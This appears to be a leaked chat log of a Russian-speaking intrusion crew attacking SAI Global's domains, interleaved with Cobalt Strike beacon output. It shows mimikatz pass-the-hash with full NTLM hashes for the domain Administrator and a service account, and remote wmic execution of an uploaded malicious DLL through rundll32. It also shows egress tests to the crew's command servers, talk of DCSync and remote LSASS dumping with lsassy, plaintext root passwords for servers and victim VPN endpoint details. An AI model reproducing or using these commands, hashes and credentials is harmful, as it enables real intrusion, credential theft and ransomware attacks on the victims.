Windows Firewall Configuration Provider
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161
Microsoft Forefront Endpoint Protection 2010 Server Management
FireEye Endpoint Agent
Microsoft Visual C++ 2013 x86 Additional Runtime - 12.0.40660
Microsoft Visual C++ 2012 x86 Additional Runtime - 11.0.60610
Configuration Manager Client
Microsoft RichCopy 4.0
Microsoft Endpoint Protection Management Components
Microsoft Visual C++ 2013 x64 Minimum Runtime - 12.0.40660
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148
Windows Resource Kit Tools - SubInAcl.exe
Microsoft Silverlight
Microsoft Security Client
Microsoft Policy Platform
WMI Exporter
Rapid7 Insight Agent
``тоже отработало``
shell wmic /node:10.225.10.202 product get name
``итасклисто под токеном выдалопробуй вмиком
может порт закрыт...под токеном ?```
beacon> shell tasklist /s 10.225.10.202 /v
[*] Tasked beacon to run: tasklist /s 10.225.10.202 /v
[+] host called home, sent: 59 bytes
```агав прошлый раз не успел тасклисты запроситьмне тут осталось те что внизу отсорироватьну и "каталог серверов" по назначениюверно[ ](https://mediaeveryone.com/group/saiglobal-com?msg=foqLBWJKz6u69XSe4) 1``
dn:CN=saig.frd.global,CN=System,DC=datacenter,DC=local
>whenCreated: 2018/06/09-00:59:39 AUS Eastern Daylight Time
>name: saig.frd.global
>securityIdentifier: S-1-5-21-2959458370-3657645319-1944215935
>trustDirection: 3 [Inbound(1);Outbound(2)]
>trustPartner: saig.frd.global
>trustType: 2 [UpLevel(2)]
>trustAttributes: 4 [Quarantined-Domain(4)]
dn:CN=frd.global,CN=System,DC=datacenter,DC=local
>whenCreated: 2018/04/14-00:59:25 AUS Eastern Daylight Time
>name: frd.global
>securityIdentifier: S-1-5-21-2724714270-1340506477-316473475
>trustDirection: 3 [Inbound(1);Outbound(2)]
>trustPartner: frd.global
>trustType: 2 [UpLevel(2)]
>trustAttributes: 8 [Transitive(8)]
``в датацентре сняты:
AdFind
DA
EA
LA
DC
DCSyncтрасты все сняты?теперь ищу креды от АВ и насы, правильно?да)наконец-тоспустя тысячу летвсё я в датацентре))дэлка то на мою кобублять``
beacon> pth datacenter.local\Administrator c49d5b83342b859132197d0a73592c0e
[*] Tasked beacon to run mimikatz's sekurlsa::pth /user:Administrator /domain:datacenter.local /ntlm:c49d5b83342b859132197d0a73592c0e /run:"%COMSPEC% /c echo d8c5e886568 > \\.\pipe\da5531" command
[+] host called home, sent: 438886 bytes
[+] Impersonated NT AUTHORITY\SYSTEM
[+] received output:
user : Administrator
domain : datacenter.local
program : C:\Windows\system32\cmd.exe /c echo d8c5e886568 > \\.\pipe\da5531
impers. : no
NTLM : c49d5b83342b859132197d0a73592c0e
| PID 6988
| TID 4548
| LSA Process is now R/W
| LUID 0 ; 1615963531 (000000:6051a58b)
\_ msv1_0 - data copy @ 0000006D65B9E580 : OK !
\_ kerberos - data copy @ 0000006D6776F5E8
\_ aes256_hmac -> null
\_ aes128_hmac -> null
\_ rc4_hmac_nt OK
\_ rc4_hmac_old OK
\_ rc4_md4 OK
\_ des_cbc_md5 -> null
\_ des_cbc_crc -> null
\_ rc4_hmac_nt_exp OK
\_ rc4_hmac_old_exp OK
\_ *Password replace @ 0000006D65B7B1A8 (16) -> null
beacon> shell wmic /node:10.225.10.201 process call create "cmd /c ping stormname.com > C:\ProgramData\p.txt"
[*] Tasked beacon to run: wmic /node:10.225.10.201 process call create "cmd /c ping stormname.com > C:\ProgramData\p.txt"
[+] host called home, sent: 126 bytes
[+] received output:
Executing (Win32_Process)->Create()
Method execution successful.
Out Parameters:
instance of __PARAMETERS
{
ProcessId = 3312;
ReturnValue = 0;
};
beacon> shell type \\10.225.10.201\C$\ProgramData\p.txt
[*] Tasked beacon to run: type \\10.225.10.201\C$\ProgramData\p.txt
[+] host called home, sent: 72 bytes
[+] received output:
Pinging stormname.com [104.200.67.11] with 32 bytes of data:
Reply from 104.200.67.11: bytes=32 time=51ms TTL=55
Reply from 104.200.67.11: bytes=32 time=51ms TTL=55
Reply from 104.200.67.11: bytes=32 time=51ms TTL=55
Reply from 104.200.67.11: bytes=32 time=51ms TTL=55
Ping statistics for 104.200.67.11:
Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 51ms, Maximum = 51ms, Average = 51ms
beacon> rm \\10.225.10.201\C$\ProgramData\p.txt
[*] Tasked beacon to remove \\10.225.10.201\C$\ProgramData\p.txt
[+] host called home, sent: 44 bytes
beacon> upload /home/user/Desktop/cobalt/dll_maker/x64.dll
[*] Tasked beacon to upload /home/user/Desktop/cobalt/dll_maker/x64.dll as x64.dll
[+] host called home, sent: 139699 bytes
beacon> shell copy x64.dll \\10.225.10.201\C$\ProgramData\
[*] Tasked beacon to run: copy x64.dll \\10.225.10.201\C$\ProgramData\
[+] host called home, sent: 75 bytes
[+] received output:
1 file(s) copied.
beacon> shell wmic /node:10.225.10.201 process call create "rundll32 C:\ProgramData\x64.dll entryPoint"
[*] Tasked beacon to run: wmic /node:10.225.10.201 process call create "rundll32 C:\ProgramData\x64.dll entryPoint"
[+] host called home, sent: 120 bytes
[+] received output:
Executing (Win32_Process)->Create()
Method execution successful.
Out Parameters:
instance of __PARAMETERS
{
ProcessId = 4664;
ReturnValue = 0;
};
beacon> shell dir \\10.225.10.201\C$\ProgramData\x64.dll
[*] Tasked beacon to run: dir \\10.225.10.201\C$\ProgramData\x64.dll
[+] host called home, sent: 73 bytes
[+] received output:
Volume in drive \\10.225.10.201\C$ has no label.
Volume Serial Number is 2AC9-2F68
Directory of \\10.225.10.201\C$\ProgramData
File Not Found
``пробую из кобы @user3
тоже не притягивается, хотя кобу пингует:^(чё он всех видит, меня не видит``
user 2-2[AUHDC1-COPADS01]SYSTEM */5008|20Oct07 23:48:21> shell wmic /node:10.225.10.201 process call create "cmd /c ping passloft.com > C:\ProgramData\p.txt"
[*] Tasked beacon to run: wmic /node:10.225.10.201 process call create "cmd /c ping passloft.com > C:\ProgramData\p.txt"
[+] host called home, sent: 125 bytes
[+] received output:
Executing (Win32_Process)->Create()
Method execution successful.
Out Parameters:
instance of __PARAMETERS
{
ProcessId = 464;
ReturnValue = 0;
};
[+] host called home, sent: 32 bytes
[+] host called home, sent: 32 bytes
user 2-2[AUHDC1-COPADS01]SYSTEM */5008|20Oct07 23:49:20> shell type \\10.225.10.201\C$\ProgramData\p.txt
[Tasked beacon to run: type \\10.225.10.201\C$\ProgramData\p.txt
[+] host called home, sent: 72 bytes
[+] received output:
Pinging passloft.com [192.169.7.15] with 32 bytes of data:
Reply from 192.169.7.15: bytes=32 time=52ms TTL=55
Reply from 192.169.7.15: bytes=32 time=51ms TTL=55
Reply from 192.169.7.15: bytes=32 time=52ms TTL=55
Reply from 192.169.7.15: bytes=32 time=52ms TTL=55
Ping statistics for 192.169.7.15:
Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 51ms, Maximum = 52ms, Average = 51ms
user 2-2[AUHDC1-COPADS01]SYSTEM */5008|20Oct07 23:49:51> rm \\10.225.10.201\C$\ProgramData\p.txt
[Tasked beacon to remove \\10.225.10.201\C$\ProgramData\p.txt
[+] host called home, sent: 44 bytes
``dalто есть реально не проще просто дать пасс от своей кобы?вы хотите какой то листенер развернуть на ДК saiglobal.com?вот инициатор сейчас объяснитне понял?)а если ДК saiglobal.com будет через себя трафик пропускать?я думаю @user1 не противиз .128 тогда могу с ней работать?а дает нагузку на твой адрест к он не через себя пропускает трафикехнеапри том, что мою кобу он не видитполучится?а если он себе притянет, а потом мне заспавнитс его кобы работать?+коба user1 пингануласьпроверь доступностьвозьми кобу коллегину вот и ответ)``
beacon> shell type \\10.225.10.201\C$\ProgramData\sq.txt
[*] Tasked beacon to run: type \\10.225.10.201\C$\ProgramData\sq.txt
[+] host called home, sent: 73 bytes
[+] received output:
Pinging firedi.com [23.106.215.146] with 32 bytes of data:
Request timed out.
Request timed out.
Request timed out.
Request timed out.
Ping statistics for 23.106.215.146:
Packets: Sent = 4, Received = 0, Lost = 4 (100% loss),
```ты же пытаешься их притянуть)пинг оттуда на твою кобу``
beacon> shell ping firedi.com
[*] Tasked beacon to run: ping firedi.com
[+] host called home, sent: 46 bytes
[+] received output:
Pinging firedi.com [23.106.215.146] with 32 bytes of data:
Reply from 23.106.215.146: bytes=32 time=70ms TTL=54
Reply from 23.106.215.146: bytes=32 time=69ms TTL=54
Reply from 23.106.215.146: bytes=32 time=68ms TTL=54
Reply from 23.106.215.146: bytes=32 time=68ms TTL=54
Ping statistics for 23.106.215.146:
Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 68ms, Maximum = 70ms, Average = 68ms
``попробуй пинг на свою кобу``
beacon> pth datacenter.local\Administrator c49d5b83342b859132197d0a73592c0e
[*] Tasked beacon to run mimikatz's sekurlsa::pth /user:Administrator /domain:datacenter.local /ntlm:c49d5b83342b859132197d0a73592c0e /run:"%COMSPEC% /c echo a8192f714f5 > \\.\pipe\da0134" command
[+] host called home, sent: 438886 bytes
[+] Impersonated NT AUTHORITY\SYSTEM
[+] received output:
user : Administrator
domain : datacenter.local
program : C:\Windows\system32\cmd.exe /c echo a8192f714f5 > \\.\pipe\da0134
impers. : no
NTLM : c49d5b83342b859132197d0a73592c0e
| PID 6148
| TID 4308
| LSA Process is now R/W
| LUID 0 ; 1594533110 (000000:5f0aa4f6)
\_ msv1_0 - data copy @ 0000006D664CBE00 : OK !
\_ kerberos - data copy @ 0000006D665014C8
\_ aes256_hmac -> null
\_ aes128_hmac -> null
\_ rc4_hmac_nt OK
\_ rc4_hmac_old OK
\_ rc4_md4 OK
\_ des_cbc_md5 -> null
\_ des_cbc_crc -> null
\_ rc4_hmac_nt_exp OK
\_ rc4_hmac_old_exp OK
\_ *Password replace @ 0000006D664D0B18 (16) -> null
beacon> shell dir \\10.225.10.201\C$\ProgramData\
[*] Tasked beacon to run: dir \\10.225.10.201\C$\ProgramData\
[+] host called home, sent: 66 bytes
[+] received output:
Volume in drive \\10.225.10.201\C$ has no label.
Volume Serial Number is 2AC9-2F68
Directory of \\10.225.10.201\C$\ProgramData
07/16/2016 09:23 AM Comms
10/06/2020 12:45 AM FireEye
10/06/2020 08:24 AM 8,192 ntuser.dat
05/30/2019 02:57 PM Package Cache
04/24/2019 03:13 PM regid.1991-06.com.microsoft
07/16/2016 09:23 AM SoftwareDistribution
02/02/2018 03:38 PM USOPrivate
02/02/2018 03:38 PM USOShared
03/13/2019 01:10 PM VMware
1 File(s) 8,192 bytes
8 Dir(s) 61,425,848,320 bytes free
beacon> shell wmic /node:10.225.10.201 process call create "cmd /c ping google.com > C:\ProgramData\p.txt"
[*] Tasked beacon to run: wmic /node:10.225.10.201 process call create "cmd /c ping google.com > C:\ProgramData\p.txt"
[+] host called home, sent: 123 bytes
[+] received output:
Executing (Win32_Process)->Create()
Method execution successful.
Out Parameters:
instance of __PARAMETERS
{
ProcessId = 5972;
ReturnValue = 0;
};
beacon> shell type \\10.225.10.201\C$\ProgramData\p.txt
[*] Tasked beacon to run: type \\10.225.10.201\C$\ProgramData\p.txt
[+] host called home, sent: 72 bytes
[+] received output:
Pinging google.com [108.177.122.100] with 32 bytes of data:
Reply from 108.177.122.100: bytes=32 time=2ms TTL=106
Reply from 108.177.122.100: bytes=32 time=1ms TTL=106
Reply from 108.177.122.100: bytes=32 time=1ms TTL=106
Reply from 108.177.122.100: bytes=32 time=2ms TTL=106
Ping statistics for 108.177.122.100:
Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 1ms, Maximum = 2ms, Average = 1ms
beacon> rm \\10.225.10.201\C$\ProgramData\p.txt
[*] Tasked beacon to remove \\10.225.10.201\C$\ProgramData\p.txt
[+] host called home, sent: 44 bytes
beacon> shell dir
[*] Tasked beacon to run: dir
[+] host called home, sent: 34 bytes
[+] received output:
Volume in drive C is System
Volume Serial Number is 9AA9-9DAB
Directory of C:\ProgramData
07/27/2018 07:11 AM AppData
10/06/2020 12:20 AM FireEye
02/29/2020 03:37 PM GetSupportService_N-Central
02/17/2020 02:15 PM N-Able Technologies
10/07/2020 04:09 AM 262,144 ntuser.dat
08/23/2020 12:22 AM Package Cache
11/21/2014 08:58 PM regid.1991-06.com.microsoft
07/27/2018 07:11 AM SnowSoftware
05/19/2020 01:19 PM SolarWinds MSP
04/25/2020 12:00 AM Tenable
07/25/2020 11:30 AM VMware
10/07/2020 03:31 PM 139,680 x64.dll
2 File(s) 401,824 bytes
10 Dir(s) 24,960,004,096 bytes free
beacon> shell copy x64.dll \\10.225.10.201\C$\ProgramData\
[*] Tasked beacon to run: copy x64.dll \\10.225.10.201\C$\ProgramData\
[+] host called home, sent: 75 bytes
[+] received output:
1 file(s) copied.
beacon> shell wmic /node:10.225.10.201 process call create "rundll32 C:\ProgramData\x64.dll entryPoint"
[*] Tasked beacon to run: wmic /node:10.225.10.201 process call create "rundll32 C:\ProgramData\x64.dll entryPoint"
[+] host called home, sent: 120 bytes
[+] received output:
Executing (Win32_Process)->Create()
Method execution successful.
Out Parameters:
instance of __PARAMETERS
{
ProcessId = 6624;
ReturnValue = 0;
};
beacon> shell dir \\10.225.10.201\C$\ProgramData\x64.dll
[*] Tasked beacon to run: dir \\10.225.10.201\C$\ProgramData\x64.dll
[+] host called home, sent: 73 bytes
[+] received output:
Volume in drive \\10.225.10.201\C$ has no label.
Volume Serial Number is 2AC9-2F68
Directory of \\10.225.10.201\C$\ProgramData
File Not Found
```
нихуя опятьвторой дк пробуюостальные тоже?ну 1 не притягиваетсяв датацентр мало серверов что ли[ ](https://mediaeveryone.com/group/saiglobal-com?msg=u28Sfxmtj3eQaJTo) я же писалкак разкреды то в синке и взялна датацентре делка не отрабатывалаа стоптам у всех админов пассы сменили?вот дсинк с этого доменакоторыми прошлый раз лезте не подошлиот датацентра кредов нетSaigProd.local [10.195.100.1]ты сюда лезешь?``
datacenter.local [10.225.10.200]
``ты про это?
```
saig.frd.global [10.210.8.236]
datacenter.local [10.225.10.200]
frd.global [10.225.12.1]
SaigProd.local [10.195.100.1]
c360.local [10.195.43.2]
legalco.local [10.195.23.1]
``другие сервера тоже закрыты?``
beacon> shell type \\10.195.100.1\C$\ProgramData\p.txt
[*] Tasked beacon to run: type \\10.195.100.1\C$\ProgramData\p.txt
[+] host called home, sent: 71 bytes
[+] received output:
Pinging google.com [216.58.196.142] with 32 bytes of data:
Reply from 216.58.196.142: bytes=32 time=2ms TTL=114
Reply from 216.58.196.142: bytes=32 time=2ms TTL=114
Reply from 216.58.196.142: bytes=32 time=2ms TTL=114
Reply from 216.58.196.142: bytes=32 time=2ms TTL=114
Ping statistics for 216.58.196.142:
Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 2ms, Maximum = 2ms, Average = 2ms
```а в файле?```
beacon> shell wmic /node:10.195.100.1 process call create "cmd /c ping google.com > C:\ProgramData\p.txt"
[*] Tasked beacon to run: wmic /node:10.195.100.1 process call create "cmd /c ping google.com > C:\ProgramData\p.txt"
[+] host called home, sent: 122 bytes
[+] received output:
Executing (Win32_Process)->Create()
Method execution successful.
Out Parameters:
instance of __PARAMETERS
{
ProcessId = 5772;
ReturnValue = 0;
};
beacon> shell dir \\10.195.100.1\C$\ProgramData\p.txt
[*] Tasked beacon to run: dir \\10.195.100.1\C$\ProgramData\p.txt
[+] host called home, sent: 70 bytes
[+] received output:
Volume in drive \\10.195.100.1.C$ has no label.
Volume Serial Number is B042-5E3A
Directory of \\10.195.100.1\C$\ProgramData
10/07/2020 03:38 PM 472 p.txt
1 File(s) 472 bytes
0 Dir(s) 63,656,124,416 bytes free
``ты так и не отпинговал гугл оттуда?а внешку то видит? xDсесии опять нет нихуя``
beacon> pth SaigProd.local\svc.sccmcliinst aa9249f57aba289658fde8afe795fd67
[*] Tasked beacon to run mimikatz's sekurlsa::pth /user:svc.sccmcliinst /domain:SaigProd.local /ntlm:aa9249f57aba289658fde8afe795fd67 /run:"%COMSPEC% /c echo bc8a1c163ef > \\.\pipe\ef7d36" command
[+] host called home, sent: 23 bytes
[+] host called home, sent: 438863 bytes
[+] Impersonated NT AUTHORITY\SYSTEM
[+] received output:
user : svc.sccmcliinst
domain : SaigProd.local
program : C:\Windows\system32\cmd.exe /c echo bc8a1c163ef > \\.\pipe\ef7d36
impers. : no
NTLM : aa9249f57aba289658fde8afe795fd67
| PID 5712
| TID 4988
| LSA Process is now R/W
| LUID 0 ; 1593611577 (000000:5efc9539)
\_ msv1_0 - data copy @ 0000006D65BDB260 : OK !
\_ kerberos - data copy @ 0000006D6776C4E8
\_ aes256_hmac -> null
\_ aes128_hmac -> null
\_ rc4_hmac_nt OK
\_ rc4_hmac_old OK
\_ rc4_md4 OK
\_ des_cbc_md5 -> null
\_ des_cbc_crc -> null
\_ rc4_hmac_nt_exp OK
\_ rc4_hmac_old_exp OK
\_ *Password replace @ 0000006D65B7ABC8 (16) -> null
beacon> ls \\10.195.100.1\C$\ProgramData
[*] Tasked beacon to list files in \\10.195.100.1\C$\ProgramData
[+] host called home, sent: 47 bytes
[*] Listing: \\10.195.100.1\C$\ProgramData\
Size Type Last Modified Name
---- ---- ------------- ----
dir 08/22/2013 10:48:41 Application Data
dir 08/22/2013 10:48:41 Desktop
dir 08/22/2013 10:48:41 Documents
dir 10/06/2020 00:44:16 FireEye
dir 07/16/2020 08:54:26 Microsoft
dir 07/25/2020 03:40:51 Package Cache
dir 11/14/2013 02:16:11 regid.1991-06.com.microsoft
dir 08/22/2013 10:48:41 Start Menu
dir 08/22/2013 10:48:41 Templates
dir 07/25/2020 03:41:11 VMware
70kb file 09/19/2020 21:56:17 ntuser.pol
beacon> pwd
[*] Tasked beacon to print working directory
[+] host called home, sent: 8 bytes
[*] Current directory is C:\Windows
beacon> cd C:\ProgramData
[*] cd C:\ProgramData
[+] host called home, sent: 22 bytes
beacon> upload /home/user/Desktop/cobalt/dll_maker/x64.dll
[*] Tasked beacon to upload /home/user/Desktop/cobalt/dll_maker/x64.dll as x64.dll
[+] host called home, sent: 139699 bytes
beacon> shell copy x64.dll \\10.195.100.1\C$\ProgramData
[*] Tasked beacon to run: copy x64.dll \\10.195.100.1\C$\ProgramData
[+] host called home, sent: 73 bytes
[+] received output:
1 file(s) copied.
beacon> shell dir \\10.195.100.1\C$\ProgramData
[*] Tasked beacon to run: dir \\10.195.100.1\C$\ProgramData
[+] host called home, sent: 64 bytes
beacon> shell dir \\10.195.100.1\C$\ProgramData\x64.dll
[+] received output:
Volume in drive \\10.195.100.1\C$ has no label.
Volume Serial Number is B042-5E3A
Directory of \\10.195.100.1\C$\ProgramData
10/06/2020 12:44 AM FireEye
07/25/2020 03:40 AM Package Cache
11/14/2013 03:16 AM regid.1991-06.com.microsoft
07/25/2020 03:41 AM VMware
10/07/2020 03:31 PM 139,680 x64.dll
1 File(s) 139,680 bytes
4 Dir(s) 63,656,927,232 bytes free
[*] Tasked beacon to run: dir \\10.195.100.1\C$\ProgramData\x64.dll
[+] host called home, sent: 72 bytes
[+] received output:
Volume in drive \\10.195.100.1.C$ has no label.
Volume Serial Number is B042-5E3A
Directory of \\10.195.100.1\C$\ProgramData
10/07/2020 03:31 PM 139,680 x64.dll
1 File(s) 139,680 bytes
0 Dir(s) 63,656,927,232 bytes free
beacon> shell wmic /node:10.195.100.1 process call create "rundll32 C:\ProgramData\x64.dll entryPoint"
[*] Tasked beacon to run: wmic /node:10.195.100.1 process call create "rundll32 C:\ProgramData\x64.dll entryPoint"
[+] host called home, sent: 119 bytes
[+] received output:
Executing (Win32_Process)->Create()
Method execution successful.
Out Parameters:
instance of __PARAMETERS
{
ProcessId = 5056;
ReturnValue = 0;
};
beacon> shell dir \\10.195.100.1\C$\ProgramData\x64.dll
[*] Tasked beacon to run: dir \\10.195.100.1\C$\ProgramData\x64.dll
[+] host called home, sent: 72 bytes
[+] received output:
Volume in drive \\10.195.100.1.C$ has no label.
Volume Serial Number is B042-5E3A
Directory of \\10.195.100.1\C$\ProgramData
File Not Found
```это локальное обращение ведьто /node указывать нет смыслаесли ты на дедике делаешь в рамках своей же машинытам есть только АДя пошёл доделывать за user4да с тем же успехом можно спросить если на дедике то почему вообще вмикзачем /node?если на дедике - то почему через вмик на другой хост?и хватает там cmd /c в начале@tl2 он на дедике пробуетзачем так если я это прям все делаювмик запускает процес для контекста удаленной машины и сохраняет результат соответственно на ней жетратим время
ls \\169.254.195.31\c$\ProgramDataеще 1 ошибкадругое дело, уже путь верный``
beacon> shell wmic /node:169.254.195.31 process call create "ping google.com>C:\ProgramData\SOOQA.txt"
[*] Tasked beacon to run: wmic /node:169.254.195.31 process call create "ping google.com>C:\ProgramData\SOOQA.txt"
[+] host called home, sent: 119 bytes
Executing (Win32_Process)->Create()
Method execution successful.
Out Parameters:
instance of __PARAMETERS
{
ProcessId = 1156;
ReturnValue = 0;
};
Directory of C:\ProgramData
09/28/2020 01:22 PM Applications
10/05/2020 11:48 AM Binary Fortress Software
10/02/2020 03:52 PM 25,604 cn-matches.txt
10/03/2020 04:18 PM 6,518 hostnames.txt
10/02/2020 03:37 PM 0 matches-share.txt
10/02/2020 05:37 PM 818,088,516 matches_sysvol.rar
09/23/2020 12:31 PM Mozilla
10/07/2020 09:03 PM 482 output.txt
09/28/2020 02:11 PM Package Cache
10/03/2020 04:18 PM 511 ping.bat
10/07/2020 07:01 PM regid.1991-06.com.microsoft
10/03/2020 08:19 PM 18,878 result.txt
7 File(s) 818,140,509 bytes
5 Dir(s) 168,773,038,080 bytes free
```вообще кая-то болезненная штука этот пингопять что ли внимание на ping обратить``
beacon> shell wmic /node:169.254.195.31 process call create "ping google.com>C:\Windows\Temp\SOOQA.txt"
C:\ProgramData
```да ты серьезно дабляа то что хуйней страдаем это ты прав)разбирайсяя щас повторю снова забудешьхоть логи с кобы выкачивайте и там будут регулярные командызаписывайте, запоминайтеменя это заебываетя не повторительуже раз писал кака ошибкане говорю потому что уже разбирали``
beacon> shell wmic /node:169.254.195.31 process call create "ping google.com>C:\Windows\Temp\SOOQA.txt"
[*] Tasked beacon to run: wmic /node:169.254.195.31 process call create "ping google.com>C:\Windows\Temp\SOOQA.txt"
[+] host called home, sent: 120 bytes
beacon> shell dir
[*] Tasked beacon to run: dir
[+] received output:
Executing (Win32_Process)->Create()
Method execution successful.
Out Parameters:
instance of __PARAMETERS
{
ProcessId = 5764;
ReturnValue = 0;
};
[+] host called home, sent: 34 bytes
[+] received output:
Volume in drive C has no label.
Volume Serial Number is 4C8B-2027
Directory of C:\ProgramData
09/28/2020 01:22 PM Applications
10/05/2020 11:48 AM Binary Fortress Software
10/02/2020 03:52 PM 25,604 cn-matches.txt
10/03/2020 04:18 PM 6,518 hostnames.txt
10/02/2020 03:37 PM 0 matches-share.txt
10/02/2020 05:37 PM 818,088,516 matches_sysvol.rar
09/23/2020 12:31 PM Mozilla
10/07/2020 09:03 PM 482 output.txt
09/28/2020 02:11 PM Package Cache
10/03/2020 04:18 PM 511 ping.bat
10/07/2020 07:01 PM regid.1991-06.com.microsoft
10/03/2020 08:19 PM 18,878 result.txt
7 File(s) 818,140,509 bytes
5 Dir(s) 168,773,058,560 bytes free
``ты говоришь время тикает нет сказать в чем конкретно ошибка хуйней страдаемя не вижу что ты сделалгде команда выводчто не отработалонихуяне отработалочто надо проверить1+1где проебпинг во вмик не тебя пинг работаеттак блять подумаймне саиглобал в дедик выводить?да всмыслея и не понял))))))[ ](https://mediaeveryone.com/group/saiglobal-com?msg=fGGWwcFkJjfFHdZuE) а то скинул со вмикомчтож ты не сказали уже прям внутри делаешь пингтак ты уже открыл доступаа``
beacon> shell ping google.com > C:\ProgramData\output.txt
[*] Tasked beacon to run: ping google.com > C:\ProgramData\output.txt
[+] host called home, sent: 74 bytes
beacon> cd C:\ProgramData
[*] cd C:\ProgramData
[+] host called home, sent: 22 bytes
beacon> shell dir
[*] Tasked beacon to run: dir
[+] host called home, sent: 34 bytes
[+] received output:
Volume in drive C has no label.
Volume Serial Number is 4C8B-2027
Directory of C:\ProgramData
09/28/2020 01:22 PM Applications
10/05/2020 11:48 AM Binary Fortress Software
10/02/2020 03:52 PM 25,604 cn-matches.txt
10/03/2020 04:18 PM 6,518 hostnames.txt
10/02/2020 03:37 PM 0 matches-share.txt
10/02/2020 05:37 PM 818,088,516 matches_sysvol.rar
09/23/2020 12:31 PM Mozilla
10/07/2020 09:03 PM 482 output.txt
09/28/2020 02:11 PM Package Cache
10/03/2020 04:18 PM 511 ping.bat
10/07/2020 07:01 PM regid.1991-06.com.microsoft
10/03/2020 08:19 PM 18,878 result.txt
7 File(s) 818,140,509 bytes
5 Dir(s) 168,773,152,768 bytes free
```сразу команда - выводотработак ребут былща мне её заново соспавнят, она провисла на 19 часова на дедике такая команда отработает?``
beacon> shell wmic /node:10.225.10.200 process call create "ping google.com>C:\Windows\Temp\output.txt"
[*] Tasked beacon to run: wmic /node:10.225.10.200 process call create "ping google.com>C:\Windows\Temp\output.txt"
[+] host called home, sent: 120 bytes
[+] received output:
Executing (Win32_Process)->Create()
Method execution successful.
Out Parameters:
instance of __PARAMETERS
{
ProcessId = 3660;
ReturnValue = 0;
};
```скажи еще как пингуешь хосты оттуда)часики тикаютсюда не пускает иди дальшеу тебя есть фул ад, хеши и прочееоткрой любой другой серверdatacenter.localкакой домен?файла на той машине нетпытаюсь оттуда гугл пингануть с выводом в файлвнешку видит?как быть?закинул на 10.225.10.200 дэлку и запустил, выдало:
```
beacon> shell wmic /node:10.225.10.200 process call create "rundll32 C:\Windows\Temp\x64.dll entryPoint"
[*] Tasked beacon to run: wmic /node:10.225.10.200 process call create "rundll32 C:\Windows\Temp\x64.dll entryPoint"
[+] host called home, sent: 121 bytes
[+] received output:
Executing (Win32_Process)->Create()
Method execution successful.
Out Parameters:
instance of __PARAMETERS
{
ProcessId = 964;
ReturnValue = 0;
};
```
Делка отработала и удалилась, но сессии нет, процесса на удалённой машине тоже[ ](https://mediaeveryone.com/group/saiglobal-com?msg=pAQcZLTgxornyJwtC) @user4+это мнеили зачем сообщение выше?saiglobal.com это их траст?[ ](https://mediaeveryone.com/group/saiglobal-com?msg=AqTqJRs2DTrERaaWP) 1[ ](https://mediaeveryone.com/group/saiglobal-com?msg=GQEJAdZqC2XPm7pez) 2[ ](https://mediaeveryone.com/group/saiglobal-com?msg=go37ZE2uk9zwPiWgn) 1?это ктоУспешно отпингованые трасты
```
saig.frd.global [10.210.8.236]
datacenter.local [10.225.10.200]
frd.global [10.225.12.1]
SaigProd.local [10.195.100.1]
c360.local [10.195.43.2]
legalco.local [10.195.23.1]
```сейчас зальюя снял тамтам где все требования выполненывезде найдены АВ, насы и прочее?так, тут , получается, отработаны и мы их не трогаем:
datcenter.local
c360.local
standard
legalco.local
frd.global
всё верно?никсовые впски``
```
192.169.6.100
u: root
p: DG8mZZyB
---
192.52.167.104
u: root
p: PeEDMf5q
```
``друзья, совсем нет сил, я отчаливаю на сегондя, если получится поднять еще какую сеть помимо той что подняли до нужных прав - и будут силы - доберитесь домен контроллера и положите в слип на 180 пару тройку серверных сесийорошо бы ага)а че, хорошо бы))))ага
автопавнну ты даешь)загоняешь машины пачкой - куда подходят права - там снимется лсаас и выплюнет в консольеб, а я уже размечтался...(или с каждой руками дампать лсаасна каждойпросто тебе не надо создавать сессиюсамо собой это работает только на те тачки куда у тебя админские креды естьда причем тут.... ох.......посмотри на скринЛА наверно безсмысленно, потому что на тачке ДА он не админ нифигаслушай.
это уже несерьезно.
я не переводчик очевидных статей все таки`[/][:]@` тут что указывать?ну а что тут не понятно?)`lsassy [--hashes [LM:]NT] --dumppath /share/path/to/dump.dmp [/][:]@`что? ты о чем вообще?)то есть запускать без указания кредов с целью на тачку где сидит ДА?они ж просто ходят по доступнымну конечнотолько у меня админы то локальные и там где ДА сидят они не админы. Это проканает?ага щас запробую)@user4 к твоей проблеме кстати подходит отличноэто у кого много тачек с админ правами но нет нужных юзеровhttps://securityonline.info/lsassy-extract-credentials-from-lsass-remotely/ждем привычный часофнулся видимоПодвистут у нас нет ДА?`ad.happay.in`https://www.sonicwall.com/support/knowledge-base/how-to-export-the-rcf-configuration-file-from-sonicwall-and-import-it-into-global-vpn-client/170505596612216/https://www.sonicwall.com/support/knowledge-base/how-can-i-configure-wan-groupvpn-for-connecting-with-global-vpn-client/170505850768290/https://www.sonicwall.com/``
12020192.168.1.3111.93.129.1744650013946464242463136364342463537434115021:28800247726F757056504E1313:323:2:0:321:36000192.168.1.3:255.255.255.255
```gvcauto.logпоэтому и спросил В КАКОМ ТЕРМИНАЛЕи для винды lnkinfo не знаюя думал вы у него на пк проверяетев терминале спросил потому что $ - не cmdТы ярылки не чекал ниразу?В своем на компе через lnkinfo*.rcfв каком терминале?В терминаледалее ~/Desktop/New_New/lnk$ lnkinfo "Connection to 106.51.226.49.lnk "команда?Руками)чем сняли?```
Description: Connection to 111.93.129.174
Relative path : ..\..\Program Files\SonicWall\Global VPN Client\SWGVC.exe
Working directory : C:\Program Files\SonicWall\Global VPN Client
Command line arguments : /E "111.93.129.174"
```
```
Description : Connection to 106.51.226.49
Relative path : ..\..\Program Files\SonicWall\Global VPN Client\SWGVC.exe
Working directory : C:\Program Files\SonicWall\Global VPN Client
Command line arguments : /E "106.51.226.49"
``спасибо``
28b3c260711a284559121c3986ca93b65df28706a43fe7a2234a0fdf79904268 2039005F
20733646ed4d68a7243b06d6c2f81c64a60ea0a5e309219595d1493a9b59d1c5 382A0473
